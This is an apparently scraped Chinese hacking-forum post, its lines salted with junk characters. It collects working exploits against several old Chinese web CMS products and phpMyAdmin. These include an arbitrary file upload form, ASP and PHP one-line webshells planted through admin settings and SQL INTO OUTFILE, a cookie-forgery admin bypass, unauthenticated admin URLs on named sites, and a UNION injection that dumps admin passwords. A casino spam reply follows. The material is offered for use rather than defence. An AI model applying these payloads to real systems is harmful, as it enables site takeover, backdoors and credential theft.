inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
+ D8 g1 s' R; D6 ]+ ?7 n---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- [; D& P# H; D& y6 n
! J! N( P1 J5 _5 S+ p( b9 LYxShop易想购物商城4.7.1版本任意文件上传漏洞
: Z( H6 H8 a3 t8 ?& G0 d$ Z; p0 P5 V6 l9 t* r/ f
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
0 c+ l" N8 U% W- n" \" v# @2 |跳转到网站根目录上传任意文件。
6 n" o3 E( A; y/ o如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件$ ~! A" B5 Q0 \; P' |
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
, N2 I3 j$ [- E+ t! t6 j' o$ r$ xUpload a new file:<br>- i% P/ F2 E' s* x) c5 m
<input type="file" name="NewFile" size="50"><br>1 l, k& V! s2 m
<input id="btnUpload" type="submit" value="Upload">% o" h8 v$ _; T9 M7 e/ V* u1 w
</form>
' e3 k( ^7 _, x) c" q' u# v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: d' Q: v4 a$ O& |1 T2 U& V1 w# h; q) i( p% Z# q
SDcms 后台拿webshell& \& N3 e( M1 f6 l, V0 O
  }6 J7 v' {3 v* A# O* i  I
第一种方法:& q* v( L( _2 U( \
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
  S! a( |' Z; ^% b5 R把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx  v+ h8 ~9 g/ m
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
( z3 v9 {: O$ n4 y9 [; |5 f6 [第二种方法:
/ j0 d; t: F4 \6 d! L进入后台-->系统管理-->系统设置-->系统设置->上传设置;
9 ~+ Q. G* U9 C8 v在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
! b, W& Q7 W+ F# }, H第三种方法:
7 R0 R8 W6 K' l6 ]: ~* e5 P3 Y进入后台-->界面管理-->模板文件管理-->创建文件/ u! F+ N- k+ }) \" H: i
文件名写入getshell.ashx
5 J( S: G$ k( [2 {) ~4 E内容写入下面内容:) ]5 d3 v. _$ z( A" P
/====================复制下面的=========================/4 \& _$ y7 c+ A# l0 g! S' V
<%@ WebHandler Language="C#" Class="Handler" %>
! z  e& x% Y) Cusing System;4 P7 U+ s( d2 S8 t7 q" H
using System.Web;
& ~" Y( k4 r6 A: L' Rusing System.IO;
5 [6 H7 H9 G8 x* `- jpublic class Handler : IHttpHandler {+ K: u2 W- c5 [
public void ProcessRequest (HttpContext context) {
/ O! V7 v* g( hcontext.Response.ContentType = "text/plain";
8 R% _6 P% R3 t! I2 }. A1 W' |StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
1 }+ y- p: E; m& R$ Z- Yfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");. Q) l9 A- ]$ M  T' f
file1.Flush();# g2 |! `7 X5 q+ d
file1.Close();2 `# r7 e  M; i6 k6 a* y
}% J7 \% e6 p! \( I! x! U6 N2 p
public bool IsReusable {
2 A. v& S2 f8 `0 w0 E1 \$ gget {
( Y" W- @- t; O9 Y. vreturn false;
6 I& r( h/ ]' V4 V* G! @, e}
1 h* L# k: W' v+ H# U" a}! u0 r* t6 a: ?
}( @& F& t8 S, X. f0 \
/=============================================/
; Z1 B" O- U9 X访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx/ W/ ?7 a* {: I: S3 o6 x* ]
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接' ?0 E, w9 f' ~# k9 J( I
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, {/ O" }6 V* i1 ?! o; `0 A

( F2 P8 U# Z; u8 H1 lESCMS网站管理系统0day
% b' X3 c4 v3 ~! ~3 W5 P- X
* b4 g/ z9 @6 O7 T! o+ `8 I后台登陆验证是通过admin/check.asp实现的
. I9 Q! O: z$ s2 f, U, N. D) @5 _& a7 P7 I6 P+ }4 }
首先我们打开http://target.com/admin/es_index.html
  B7 Z8 F/ _% M9 @* P然后在COOKIE结尾加上- P0 N9 Y8 B  m. Q4 s/ J* d
; ESCMS$_SP2=ES_admin=st0p;1 _0 P2 F' O; \" s
修改,然后刷新1 E0 y& m& c1 o: r8 c% ?
进后台了嘎..1 F- j% u: v8 P' s. ^1 @
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL6 `. ~" K. Y( @4 X/ }

) T/ b4 K( a" d- u4 i7 D; h! {3 E利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交., w- \' \2 w5 A* ?
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
: H+ @& I% D  S2 w8 v存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
  Z% a, k9 K6 d- |: f( b, c在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& T% q; R; a* v. j. f* H5 C------------------------------------------------------------------------------------------------------------------------------------------------------------------------------! X- [' z; g1 G4 Y: S. U" n
1 R6 o; ^1 s4 q- \  u9 C/ x( a1 d
宁志网站管理系统后台无验证漏洞及修复
2 S: F  o; S  v1 M* x  J1 E, _+ [9 }2 c2 m
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
6 j  Z7 l3 j/ U$ a& F官方网站:www.ningzhi.net
; G% X7 k7 e0 c学校网站管理系统 V.2011版本
( f* _- X8 A/ y/ H3 k* Phttp://down.chinaz.com/soft/29943.htm + N2 Y9 v8 j" @4 I
其它版本(如:政府版等),自行下载.( F& C, t5 ^& y/ M9 O' V
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~8 L* e3 l$ Q$ i' S. E% v7 l
login.asp代码如下:9 {* B( `/ Z' a' d( S4 _
<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
9 j) J' F$ S0 l+ Z( l# S$ J' gmanage.asp代码我就不帖出来了.反正也没验证.
* ~2 r( U- f& j4 l, q) h& F只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!! O' h+ {! U$ \5 f
漏洞利用:
- D$ \! O& b9 x8 J1 b) Q5 w* j直接访问http://www.0855.tv/admin/manage.asp
8 m1 `& E: [2 N! L$ r数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5" l: \) b) S: \5 ^7 a! H
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; D! k" d6 B5 I& G/ j" F! ^
3 Q: h0 Q! U; S. a8 `7 Jphpmyadmin拿shell的四种方法总结及修复
8 P: @, r0 F! b$ L* I5 n6 x1 ?) Y2 j! b1 M2 b* ~
方法一:/ U0 d2 F/ v# g7 ]1 Y
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
* @6 N3 c3 a' W: G, R% \INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');# c/ U, X: G4 D# Y8 [/ W  b* {
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';' w. D+ {% D1 r, a( y/ Y
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
8 V3 i( k/ Q2 ?7 A% O# ]    一句话连接密码:7on- t/ `* _" C; f. V: {7 P
方法二:
5 K4 ^. L8 S0 D. \( w, |读取文件内容:    select load_file('E:/xamp/www/s.php');
; l4 `! L3 p- y$ m6 ]写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'3 ^' i6 |( h# V4 W& S% Q
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'. K" \: o5 @/ v5 \
方法三:
0 M7 x# n8 ?. k, dJhackJ版本 PHPmyadmin拿shell
, ?. P6 |. t# l0 q- u9 s# C+ pCreate TABLE study (cmd text NOT NULL);
7 v* s) a+ M& S1 LInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
: l% Z' O# _3 aselect cmd from study into outfile 'E:/wamp/www/7.php';% s0 U/ Z; h8 l6 F
Drop TABLE IF EXISTS study;
5 n7 Z5 R* i: l* G) ?<?php eval($_POST[cmd])?>
/ f  W# \/ A! K; A% w& b4 {7 ZCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。, m2 Y! s4 w: f! T; F5 q
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
! a& c7 m8 V" [8 f! jSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
# h0 ~. W- p* ^7 \DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。. G: Y6 E4 ?6 `1 q9 p
方法四:
, V, F% x# y" N: x- z3 T0 u1 Jselect load_file('E:/xamp/www/study.php');
# [! F  i1 K' l; Xselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
% J: P- V' c4 G& z4 F然后访问网站目录:http://www.2cto.com/study.php?cmd=dir+ ?* r, I8 o' J+ ~' e/ u
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ G# n4 h. E/ X8 v
! o) y* L1 X5 iNO.001中学网站管理系统 Build 110628 注入漏洞, b4 j# [& X9 Y; {
: N: \8 Q! a1 w
NO.001中学网站管理系统功能模块:
1 D  m; Q$ L7 h- x; |1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等  n" w: I  {* c+ O. N) i7 `
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
  `. J, d1 A# n3 C+ {- Y5 P2 g3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
& v+ R- J! @  b% }# N8 _9 |4.视频图片管理:一级分类,动态添加视频或者图片等信息/ m% n. t, S# x' R' q9 s( B
5.留言管理:对留言,修改,删除、回复等管理6 S: j. I% K6 @8 s1 |; h. p  n
6.校友频道:包括校友资料excel导出、管理等功能  V9 P* g- R) M0 Z
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页1 e( H! e. d9 q) L# o. _% P
默认后台:admin/login.asp
: U6 j. E  j2 E1 i; e官方演示:http://demo.001cms.net" `) ^4 `! d! E" Z9 }0 U. g8 C
源码下载地址:http://down.chinaz.com/soft/30187.htm
3 F% Y. I8 g$ ?EXP:6 C6 X. i8 P/ F& X& H- h  C, Q
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
% n/ ^! y  \7 L9 s& q6 Z  x测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
% z5 |$ W, @! ?& e5 Q* W- {getshell:后台有备份,你懂的
/ }1 |, p8 r' N7 N1 _) h" k2 V另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
$ z  M, B8 K# r8 X2 ]: y5 c-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表